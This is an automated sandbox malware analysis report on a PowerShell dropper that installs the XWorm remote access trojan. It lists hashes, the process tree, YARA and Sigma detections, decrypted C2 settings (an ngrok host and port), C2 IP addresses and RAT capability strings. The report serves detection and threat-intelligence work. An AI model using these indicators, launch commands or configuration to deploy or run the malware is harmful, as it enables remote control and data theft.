Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1

Overview

General Information

Sample name:20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1
Analysis ID:1602905
MD5:ac45d57d6196e0eb21f4136002fd645d
SHA1:d3d32e7473079db2dbbf959c887a16e87a22894c
SHA256:52f1718467ed6617713e995fb1ad595f9040247df74acb489285a00212f7ff7d
Tags:156-253-250-62ps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tmpB20E.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\tmpB20E.exe" MD5: F5302ED0307CE30D226D50A45A0DCA9D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\tmpB20E.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\tmpB20E.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x58a9:$str01: $VB$Local_Port
    • 0x589a:$str02: $VB$Local_Host
    • 0x5ba0:$str03: get_Jpeg
    • 0x5552:$str04: get_ServicePack
    • 0x656e:$str05: Select * from AntivirusProduct
    • 0x676c:$str06: PCRestart
    • 0x6780:$str07: shutdown.exe /f /r /t 0
    • 0x6832:$str08: StopReport
    • 0x6808:$str09: StopDDos
    • 0x68fe:$str10: sendPlugin
    • 0x697e:$str11: OfflineKeylogger Not Enabled
    • 0x6ad6:$str12: -ExecutionPolicy Bypass -File "
    • 0x6bff:$str13: Content-length: 5235
    C:\Users\user\AppData\Local\Temp\tmpB20E.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6b1a:$cnc4: POST / HTTP/1.1

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6aa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6b45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6c5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x691a:$cnc4: POST / HTTP/1.1
      00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x737e8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x73885:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7399a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7365a:$cnc4: POST / HTTP/1.1
        Process Memory Space: powershell.exe PID: 7700JoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 2 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.0.tmpB20E.exe.f10000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            4.0.tmpB20E.exe.f10000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x58a9:$str01: $VB$Local_Port
            • 0x589a:$str02: $VB$Local_Host
            • 0x5ba0:$str03: get_Jpeg
            • 0x5552:$str04: get_ServicePack
            • 0x656e:$str05: Select * from AntivirusProduct
            • 0x676c:$str06: PCRestart
            • 0x6780:$str07: shutdown.exe /f /r /t 0
            • 0x6832:$str08: StopReport
            • 0x6808:$str09: StopDDos
            • 0x68fe:$str10: sendPlugin
            • 0x697e:$str11: OfflineKeylogger Not Enabled
            • 0x6ad6:$str12: -ExecutionPolicy Bypass -File "
            • 0x6bff:$str13: Content-length: 5235
            4.0.tmpB20E.exe.f10000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x6b1a:$cnc4: POST / HTTP/1.1
            1.2.powershell.exe.1e40029eb40.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              1.2.powershell.exe.1e40029eb40.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
              • 0x3aa9:$str01: $VB$Local_Port
              • 0x3a9a:$str02: $VB$Local_Host
              • 0x3da0:$str03: get_Jpeg
              • 0x3752:$str04: get_ServicePack
              • 0x476e:$str05: Select * from AntivirusProduct
              • 0x496c:$str06: PCRestart
              • 0x4980:$str07: shutdown.exe /f /r /t 0
              • 0x4a32:$str08: StopReport
              • 0x4a08:$str09: StopDDos
              • 0x4afe:$str10: sendPlugin
              • 0x4b7e:$str11: OfflineKeylogger Not Enabled
              • 0x4cd6:$str12: -ExecutionPolicy Bypass -File "
              • 0x4dff:$str13: Content-length: 5235
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", ProcessId: 7700, ProcessName: powershell.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1", ProcessId: 7700, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-30T10:36:48.589330+010028531931Malware Command and Control Activity Detected192.168.2.7576553.127.138.5710901TCP

              Joe Sandbox Signatures

              • AV Detection
              • Spreading
              • Networking
              • System Summary
              • Data Obfuscation
              • Persistence and Installation Behavior
              • Hooking and other Techniques for Hiding and Protection
              • Malware Analysis System Evasion
              • Anti Debugging
              • HIPS / PFW / Operating System Protection Evasion
              • Language, Device and Operating System Detection
              • Lowering of HIPS / PFW / Operating System Security Settings
              • Stealing of Sensitive Information
              • Remote Access Functionality

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeVirustotal: Detection: 71%Perma Link
              Source: 20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1ReversingLabs: Detection: 21%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeJoe Sandbox ML: detected
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpString decryptor: 2.tcp.eu.ngrok.io
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpString decryptor: 10901
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpString decryptor: <123456789>
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpString decryptor: <Xwormmm>
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpString decryptor: XWorm V5.6
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmpString decryptor: USB.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:57652 -> 3.127.138.57:10901
              Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:57655 -> 3.127.138.57:10901
              Source: Yara matchFile source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.7:49725 -> 3.126.37.18:10901
              Source: global trafficTCP traffic: 192.168.2.7:57576 -> 3.127.138.57:10901
              Source: global trafficTCP traffic: 192.168.2.7:57656 -> 18.157.68.73:10901
              Source: global trafficTCP traffic: 192.168.2.7:57667 -> 18.197.239.5:10901
              Source: global trafficTCP traffic: 192.168.2.7:57679 -> 18.192.93.86:10901
              Source: global trafficTCP traffic: 192.168.2.7:57556 -> 162.159.36.2:53
              Source: Joe Sandbox ViewIP Address: 3.126.37.18 3.126.37.18
              Source: Joe Sandbox ViewIP Address: 3.127.138.57 3.127.138.57
              Source: Joe Sandbox ViewIP Address: 18.192.93.86 18.192.93.86
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: 2.tcp.eu.ngrok.io
              Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
              Source: powershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmp, tmpB20E.exe, 00000004.00000002.3784517191.0000000003191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000002.1351823605.000001E400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401A4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000001.00000002.1368287437.000001E4101E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1368287437.000001E410081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1351823605.000001E401B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000001.00000002.1351823605.000001E401646000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

              System Summary

              barindex
              Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB20E.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeCode function: 4_2_00007FFAAC5B6B224_2_00007FFAAC5B6B22
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeCode function: 4_2_00007FFAAC5B5D764_2_00007FFAAC5B5D76
              Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 4.0.tmpB20E.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 1.2.powershell.exe.1e40029eb40.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000000.1350762891.0000000000F12000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000001.00000002.1351823605.000001E400232000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: tmpB20E.exe.1.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: tmpB20E.exe.1.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: tmpB20E.exe.1.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: tmpB20E.exe.1.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: tmpB20E.exe.1.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winPS1@4/6@6/5
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeMutant created: NULL
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeMutant created: \Sessions\1\BaseNamedObjects\RHFLgv5hS2K0LrpS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdtqpgsd.w2q.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: 20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1ReversingLabs: Detection: 21%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\20f8b1d9eabf499dbc7a0bff6ee7ddec.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpB20E.exe "C:\Users\user\AppData\Local\Temp\tmpB20E.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpB20E.exe "C:\Users\user\AppData\Local\Temp\tmpB20E.exe" Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
